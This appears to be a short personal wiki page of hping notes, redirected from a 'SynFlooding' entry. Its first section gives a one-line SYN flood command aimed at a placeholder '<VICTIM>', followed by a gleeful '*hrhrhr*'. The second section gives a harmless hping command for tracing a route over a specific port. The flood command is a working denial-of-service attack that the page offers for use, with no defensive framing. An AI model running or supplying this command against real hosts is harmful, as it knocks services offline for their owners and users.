Hping
Aus SchnallIchNet
(Weitergeleitet von SynFlooding)
SYN Flooding
hping -i u1 -S -p 80 <VICTIM>
*hrhrhr*
Traceroute spec. ports
on port-based routing environments you cann not simply use traceroute because the port traceroute uses may be going another route than the port you want to check... hping lets you do that:
hping2 -t 1 --traceroute -p <PORT> <DESTINATION>